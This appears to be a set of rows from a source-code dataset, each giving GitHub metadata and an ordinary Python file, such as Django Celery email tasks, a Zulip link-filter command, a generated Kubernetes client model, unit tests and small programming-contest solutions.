refs/heads/main
| 2023-09-01T15:41:03.628720
| 2023-08-30T10:52:13
| 2023-08-30T10:52:13
| 175,209,828
| 13
| 14
|
MIT
| 2021-04-29T12:30:31
| 2019-03-12T12:47:18
|
Python
|
UTF-8
|
Python
| false
| false
| 194
|
py
|
# coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
class ProfileH262(Enum):
MPEG2_422 = "MPEG2_422"
|
[
"openapi@bitmovin.com"
] |
openapi@bitmovin.com
|
27e87424929b5c8237e98b92155346589f22cff5
|
f00ad57c98e554470a72511dda7a7bfd160aca19
|
/others/test_compress_str.py
|
21fe737a9d075590a8f39e8909d0acdd69b93853
|
[] |
no_license
|
fanzhangg/algorithm-problems
|
d60115210aaaffcd094b34b9db5b46dadf93fe9e
|
43b111ad625f197ba0905abceab9ee4484284e08
|
refs/heads/master
| 2021-07-12T20:24:46.265700
| 2020-07-06T17:58:31
| 2020-07-06T17:58:31
| 171,220,135
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
from unittest import TestCase
from compress_string import compress_str
class TestCompressStr(TestCase):
def test_compress_str(self):
self.assertEqual(compress_str("AAAAaaBCCCDDe"), "A4a2B1C3D2e1")
|
[
"vanadiumzhang@gmail.com"
] |
vanadiumzhang@gmail.com
|
497ff7a37a21b8d7b26e76ad4a2070a35baf71cc
|
bb87afa0fd2f5466f282ba93779293449ae72e9f
|
/apps/article/tasks.py
|
0377213159cd91d4dfd25488e3ce850c0d8f288e
|
[
"MIT"
] |
permissive
|
xuechuance/website
|
14d50e6c66f4315f5829f5a2707fc7bdf3925266
|
91a017ea26806136a89f12d8620a4d99676a7497
|
refs/heads/master
| 2020-05-27T06:18:36.403271
| 2019-05-21T04:28:02
| 2019-05-21T04:28:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,889
|
py
|
from __future__ import absolute_import
import datetime
from configparser import ConfigParser
from time import sleep
import requests
from celery import shared_task
from django.core.mail import send_mail
from random import Random
import random
from apps.article.models import Headlines
from apps.user.models import VerifyCode
from website import settings
from website.celery import app
def random_str(randomlength=8):
str=""
chars="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
lenght = len(chars)-1
for i in range(randomlength):
str+=chars[random.randint(0,lenght)]
print(str)
return str
@app.task()
def send_register_email(email,username=None,token=None,send_type='register'):
"""
登录注册等邮件发送
:param email:
:param username:
:param token:
:param send_type:
:return:
"""
code = random_str(4)
email_title = ''
email_body = ''
if send_type =='register':
email_title = '注册用户验证信息'
email_body = "\n".join([u'{0},欢迎加入我的博客'.format(username), u'请访问该链接,完成用户验证,该链接1个小时内有效',
'/'.join([settings.DOMAIN, 'activate', token])])
print('========发送邮件中')
send_stutas = send_mail(email_title,email_body,settings.EMAIL_HOST_USER,[email])
if send_stutas:
print('========发送成功')
pass
elif send_type == 'forget':
VerifyCode.objects.create(code=code, email=email, send_type=send_type)
email_title = '密码重置链接'
email_body = "你的密码重置验证码为:{0}。如非本人操作请忽略,此验证码30分钟后失效。".format(code)
print('========发送邮件中')
send_stutas = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
if send_stutas:
print('========发送成功')
pass
elif send_type =='update_email':
VerifyCode.objects.create(code=code, email=email, send_type=send_type)
email_title = '修改邮箱链接'
email_body = "你的修改邮箱验证码为:{0}。如非本人操作请忽略,此验证码30分钟后失效。".format(code)
print('========发送邮件中')
send_stutas = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
if send_stutas:
print('========发送成功')
pass
@app.task()
def error_email(email,title=None,body=None):
email_title = title
email_body = body
send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
@app.task()
def add():
print('发送邮件到**************************************************************' )
sleep(5) # 休息5秒
print('success')
return True
conf = ConfigParser()
conf.read('config.ini')
@app.task()
def getApi():
print('正在获取数据...')
#url = 'http://api01.idataapi.cn:8000/article/idataapi?KwPosition=3&catLabel1=科技&apikey={0}'.format(conf.get('iDataApi','key'))
url = 'http://v.juhe.cn/toutiao/index?type=keji&key={0}'.format(conf.get('AppKey','key'))
headers = {
"Accept-Encoding": "gzip",
"Connection": "close"
}
try:
r = requests.get(url, headers=headers)
if r.status_code == requests.codes.ok:
dict_json = r.json()
list_dict = []
for item in dict_json['result']['data']:
# obj = Headlines(
# url=item['url'],
# title=item['title'],
# category=item['catLabel1'],
# conent=item['content'],
# author_name=item['sourceType'],
# )
obj = Headlines(
url=item['url'],
title=item['title'],
category=item['category'],
conent=item['title'],
author_name=item['author_name'],
)
list_dict.append(obj)
Headlines.objects.bulk_create(list_dict)
print('数据添加成功')
except Exception as e:
print('数据添加失败===正在发生邮件通知管理员',e)
error_email.delay('tarena_feng@126.com','抓取数据错误','{0}'.format(e))
print('邮件发送成功')
@app.task()
def removeApi():
# 当前日期格式
cur_date = datetime.datetime.now().date()
# 前一天日期
yester_day = cur_date - datetime.timedelta(days=1)
# 前一周日期
day = cur_date - datetime.timedelta(days=7)
print("=======正在删除7天前数据======")
# 查询前一周数据,也可以用range,我用的是glt,lte大于等于
Headlines.objects.filter(add_time__lte=day).delete()
print('======已删除=========')
|
[
"tarena_feng@126.com"
] |
tarena_feng@126.com
|
21ee44b6155df6c86db7afac320d841dd0a6eea7
|
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
|
/python/zulip/2016/4/realm_filters.py
|
3ebd74a423ccd5d544621ba6011b7915cf5d5e90
|
[] |
no_license
|
rosoareslv/SED99
|
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
|
a062c118f12b93172e31e8ca115ce3f871b64461
|
refs/heads/main
| 2023-02-22T21:59:02.703005
| 2021-01-28T19:40:51
| 2021-01-28T19:40:51
| 306,497,459
| 1
| 1
| null | 2020-11-24T20:56:18
| 2020-10-23T01:18:07
| null |
UTF-8
|
Python
| false
| false
| 2,844
|
py
|
from __future__ import absolute_import
from __future__ import print_function
from optparse import make_option
from django.core.management.base import BaseCommand
from zerver.models import RealmFilter, all_realm_filters, get_realm
from zerver.lib.actions import do_add_realm_filter, do_remove_realm_filter
import sys
class Command(BaseCommand):
help = """Create a link filter rule for the specified domain.
NOTE: Regexes must be simple enough that they can be easily translated to JavaScript
RegExp syntax. In addition to JS-compatible syntax, the following features are available:
* Named groups will be converted to numbered groups automatically
* Inline-regex flags will be stripped, and where possible translated to RegExp-wide flags
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=add '#(?P<id>[0-9]{2,8})' 'https://trac.humbughq.com/ticket/%(id)s'
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=remove '#(?P<id>[0-9]{2,8})'
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=show
"""
def add_arguments(self, parser):
parser.add_argument('-r', '--realm',
dest='domain',
type=str,
required=True,
help='The name of the realm to adjust filters for.')
parser.add_argument('--op',
dest='op',
type=str,
default="show",
help='What operation to do (add, show, remove).')
parser.add_argument('pattern', metavar='<pattern>', type=str, nargs='?', default=None,
help="regular expression to match")
parser.add_argument('url_format_string', metavar='<url pattern>', type=str, nargs='?',
help="format string to substitute")
def handle(self, *args, **options):
realm = get_realm(options["domain"])
if options["op"] == "show":
print("%s: %s" % (realm.domain, all_realm_filters().get(realm.domain, [])))
sys.exit(0)
pattern = options['pattern']
if not pattern:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
if options["op"] == "add":
url_format_string = options['url_format_string']
if not url_format_string:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
do_add_realm_filter(realm, pattern, url_format_string)
sys.exit(0)
elif options["op"] == "remove":
do_remove_realm_filter(realm, pattern)
sys.exit(0)
else:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
|
[
"rodrigosoaresilva@gmail.com"
] |
rodrigosoaresilva@gmail.com
|
94709ea9fdd3f5b965a753f366702dbec38c259a
|
c0c6b41523d8f8071c88d4320d9040a6d1d2e3f4
|
/problem1
|
80d2761714d5ce30c6ac12310c7fc42a98b8b028
|
[] |
no_license
|
GLAU-TND/python-programming-assignment-2-Manish-021
|
952cf9bd8a4f953074595f7c7d164541eba94443
|
782bdef864fadac653e500d03498de6c92c56382
|
refs/heads/master
| 2021-01-09T11:43:22.749103
| 2020-02-24T11:42:25
| 2020-02-24T11:42:25
| 242,287,538
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 225
|
t=eval(input())
b=[min(t)]
a=min(t)[-1]
t.remove(min(t))
for i in t:
for j in t:
if a==j[0] and j[-1]!=b[0][0]:
b.append(j)
a=j[-1]
t.remove(j)
break
b=b+t
print(b)
|
[
"noreply@github.com"
] |
GLAU-TND.noreply@github.com
|
|
81008224cac8591b4f00dcd38bf9b8e5cc34dc27
|
30ec40dd6a81dbee73e7f14c144e20495960e565
|
/kubernetes/client/models/v1beta1_http_ingress_rule_value.py
|
9653f80f26ca995284fb6ca79ec30368e71cd13e
|
[
"Apache-2.0"
] |
permissive
|
jonathan-kosgei/client-python
|
ae5a46968bcee19a3c62e1cefe227131ac9e7200
|
4729e6865d810824cafa312b4d06dfdb2d4cdb54
|
refs/heads/master
| 2021-01-20T14:59:10.435626
| 2017-05-08T16:55:51
| 2017-05-08T16:55:51
| 90,700,132
| 1
| 0
| null | 2017-05-09T03:50:42
| 2017-05-09T03:50:42
| null |
UTF-8
|
Python
| false
| false
| 3,300
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1HTTPIngressRuleValue(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, paths=None):
"""
V1beta1HTTPIngressRuleValue - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'paths': 'list[V1beta1HTTPIngressPath]'
}
self.attribute_map = {
'paths': 'paths'
}
self._paths = paths
@property
def paths(self):
"""
Gets the paths of this V1beta1HTTPIngressRuleValue.
A collection of paths that map requests to backends.
:return: The paths of this V1beta1HTTPIngressRuleValue.
:rtype: list[V1beta1HTTPIngressPath]
"""
return self._paths
@paths.setter
def paths(self, paths):
"""
Sets the paths of this V1beta1HTTPIngressRuleValue.
A collection of paths that map requests to backends.
:param paths: The paths of this V1beta1HTTPIngressRuleValue.
:type: list[V1beta1HTTPIngressPath]
"""
if paths is None:
raise ValueError("Invalid value for `paths`, must not be `None`")
self._paths = paths
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1HTTPIngressRuleValue):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"mehdy@google.com"
] |
mehdy@google.com
|
a098dbcf2862c4b934dc7a374423ead058106d1c
|
1e84a9fec36deaf9a55a2734749ea035f72ac869
|
/KAKAO BLIND RECRUITMENT/2017/1차/다트 게임/refernece_code.py
|
f0d49073d4794a7333d54379d6f483324e86a55c
|
[] |
no_license
|
mgh3326/programmers_algorithm
|
aa3afc91231550e1fec2d72d90e85b140f79d677
|
b62f08ccccbdcac71e484d508985a5a9ce5f2434
|
refs/heads/master
| 2022-08-31T04:19:15.728666
| 2022-07-31T14:02:26
| 2022-07-31T14:02:26
| 201,747,526
| 0
| 0
| null | 2022-07-23T10:19:13
| 2019-08-11T10:02:15
|
Python
|
UTF-8
|
Python
| false
| false
| 601
|
py
|
def solution(dartResult):
point = []
answer = []
dartResult = dartResult.replace('10','k')
point = ['10' if i == 'k' else i for i in dartResult]
print(point)
i = -1
sdt = ['S', 'D', 'T']
for j in point:
if j in sdt :
answer[i] = answer[i] ** (sdt.index(j)+1)
elif j == '*':
answer[i] = answer[i] * 2
if i != 0 :
answer[i - 1] = answer[i - 1] * 2
elif j == '#':
answer[i] = answer[i] * (-1)
else:
answer.append(int(j))
i += 1
return sum(answer)
|
[
"mgh3326@naver.com"
] |
mgh3326@naver.com
|
34c75ed85b11695edf53feaa3236244bd3fefc44
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-sblp-obt/sblp_ut=3.5_rd=1_rw=0.06_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=4/params.py
|
f2962918ddc7d0f6fada37b1a1592dedf23cce8d
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
{'cpus': 4,
'duration': 30,
'final_util': '3.668690',
'max_util': '3.5',
'periods': 'harmonic-2',
'release_master': False,
'res_distr': '1',
'res_nmb': '4',
'res_weight': '0.06',
'scheduler': 'RUN',
'trial': 4,
'utils': 'uni-medium-3'}
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
5fc066834916a8dbb349035d834ab8ffcd3415d5
|
c3483984a4782be6097e4753de3cb545ae00039b
|
/geneticTest/unitTestingExample/unitTesting/test_Employee.py
|
e00ef30b7b7dd17f737f32a405b4966559a25522
|
[] |
no_license
|
nghiemphan93/machineLearning
|
67c3f60f317a0c753b465751113511baaefd1184
|
36d214b27c68d399f5494b5ec9b28fee74d57f7f
|
refs/heads/master
| 2020-03-28T02:20:11.843154
| 2020-02-03T14:18:39
| 2020-02-03T14:18:39
| 147,563,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,536
|
py
|
import unittest
from geneticTest.unitTestingExample.stuffToTest.Employee import Employee
class TestEmployee(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('setupClass')
@classmethod
def tearDownClass(cls):
print('teardownClass')
def setUp(self):
print('setUp')
self.emp_1 = Employee('Corey', 'Schafer', 50000)
self.emp_2 = Employee('Sue', 'Smith', 60000)
def tearDown(self):
print('tearDown\n')
def test_email(self):
print('test_email')
self.assertEqual(self.emp_1.email, 'Corey.Schafer@email.com')
self.assertEqual(self.emp_2.email, 'Sue.Smith@email.com')
self.emp_1.first = 'John'
self.emp_2.first = 'Jane'
self.assertEqual(self.emp_1.email, 'John.Schafer@email.com')
self.assertEqual(self.emp_2.email, 'Jane.Smith@email.com')
def test_fullname(self):
print('test_fullname')
self.assertEqual(self.emp_1.fullname, 'Corey Schafer')
self.assertEqual(self.emp_2.fullname, 'Sue Smith')
self.emp_1.first = 'John'
self.emp_2.first = 'Jane'
self.assertEqual(self.emp_1.fullname, 'John Schafer')
self.assertEqual(self.emp_2.fullname, 'Jane Smith')
def test_apply_raise(self):
print('test_apply_raise')
self.emp_1.apply_raise()
self.emp_2.apply_raise()
self.assertEqual(self.emp_1.pay, 52500)
self.assertEqual(self.emp_2.pay, 63000)
if __name__ == '__main__':
unittest.main()
|
[
"nghiemphan93@gmail.com"
] |
nghiemphan93@gmail.com
|
56e2ea0cf73544e8dbe4bf9a62cade699f0cd4f7
|
353e6685be6737a828b8770d4d71e389ca2853b9
|
/0x11-python-network_1/5-hbtn_header.py
|
b7a195a4f570bbc400e36cfd7ab5c6a16a190e72
|
[] |
no_license
|
adebudev/holbertonschool-higher_level_programming
|
912af3f7caab3197beb062b5389f5b464b2ed177
|
cb0510ed0b6d7b7c43d0fd6949139b62e2bdede7
|
refs/heads/master
| 2022-12-18T17:40:28.539558
| 2020-09-25T04:29:45
| 2020-09-25T04:29:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
py
|
#!/usr/bin/python3
"""Request value X-Request-Id with requests Module"""
import requests
import sys
if __name__ == '__main__':
"""displays the value of the variable X-Request-Id"""
url = sys.argv[1]
R = 'X-Request-Id'
req = requests.get(url)
print(req.headers.get(R))
|
[
"delaasuncionbuelvasadrian@gmail.com"
] |
delaasuncionbuelvasadrian@gmail.com
|
63d41c42f8f87f62095b5bc99fda6d77e3eb4288
|
59788643fcce655a3a15ad0d3c91401a63e525d9
|
/home/models.py
|
f925cf6580cdcd1ae6f9a202aa595fe40ca9a4ba
|
[] |
no_license
|
crowdbotics-apps/element-28308
|
f39132662eb2e433d44e3c570ae539d9feae3db0
|
018966b7d47c9e2f9b1bb33c018d1a9b7a3b3b42
|
refs/heads/master
| 2023-06-06T09:31:10.513777
| 2021-06-29T20:33:03
| 2021-06-29T20:33:03
| 381,465,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
py
|
from django.conf import settings
from django.db import models
class CustomText(models.Model):
"Generated Model"
chart = models.URLField(
null=True,
blank=True,
)
class HomePage(models.Model):
"Generated Model"
body = models.TextField()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
b71cf501c6e9e920c344c180785088347c9eea05
|
398de9098811c7712b18f8e314340ce93aa86839
|
/id2date.py
|
7fc4502cd5258ae680b5604cba9dd53e78ba1f70
|
[] |
no_license
|
NiMaZi/thesis
|
0c2ce8bced070d010838bae80f844a46bb1a798c
|
15dc1aeca941f8feec4c283cd7436983ba982871
|
refs/heads/master
| 2020-03-18T13:19:52.711331
| 2018-07-09T12:11:08
| 2018-07-09T12:11:08
| 134,776,324
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
import os
import sys
import csv
import json
import boto3
import numpy as np
homedir=os.environ['HOME']
from elasticsearch import Elasticsearch
from elasticsearch.helpers import scan
es=Elasticsearch(['localhost:9200'])
s3 = boto3.resource("s3")
mybucket=s3.Bucket("workspace.scitodate.com")
s3key=sys.argv[1]
id2date={}
for i in range(0,15000):
try:
mybucket.download_file("yalun/"+s3key+"/abs"+str(i)+".txt",homedir+"/temp/tmptxt"+s3key+".txt")
except:
continue
f=open(homedir+"/temp/tmptxt"+s3key+".txt",'r',encoding='utf-8')
abstract=f.read().split(",")[0]
f.close()
results=scan(es,
query={
"query": {
"bool": {
"must": [{"match_phrase": {"abstract": abstract}}]
}
}
},
size=1
)
for n,result in enumerate(results):
if n>10:
break
if abstract in result['_source']['abstract']:
try:
id2date[i]=result['_source']['date']
except:
break
f=open(homedir+"/temp/id2date"+s3key+".json",'w')
json.dump(id2date,f)
f.close()
f=open(homedir+"/temp/id2date"+s3key+".json",'rb')
d=f.read()
f.close()
mybucket.put_object(Body=d,Key="yalun/"+s3key+"/id2date.json")
|
[
"zhengyl940425@gmail.com"
] |
zhengyl940425@gmail.com
|
6f781fbb34a0effb575b1359355f0db2026e382d
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5658571765186560_1/Python/dnutsch/problem_d.py
|
ec9d645f24bcbab7bf09cb17d6dd1abaea92f717
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,111
|
py
|
#!/usr/bin/python
f = open('D-large.in','r');
out = open('D-large.out','w');
T = int(f.readline().strip())
for t in range(T):
X,R,C = [int(x) for x in f.readline().strip().split(' ')]
#print "x {}, r {}, c {}".format(X,R,C)
mx = max(R,C)
mn = min (R,C)
richard_wins = False
if (R*C) % X != 0:
richard_wins = True
if X >=7:
richard_wins = True # can make a donut
elif X > mx:
# maybe win by bisection, assume so
richard_wins = True
elif X == mx:
# maybe can bisect in minor dimension
if X >= 4 and X >= mn + (mn -1):
richard_wins = True
else:
#can't win by bisection, try squaring
if X >= 4 and mn < 2:
richard_wins = True
if X >= 9 and mn < 3:
richard_wins = True
if X >= 16 and mn < 4:
richard_wins = True
max_angle = 1+((X-1) // 2)
if max_angle > mn:
richard_wins = True
line = "Case #{}: {}".format(t+1, "RICHARD" if richard_wins else "GABRIEL")
print line
out.write(line+"\n")
f.close()
out.close()
|
[
"eewestman@gmail.com"
] |
eewestman@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.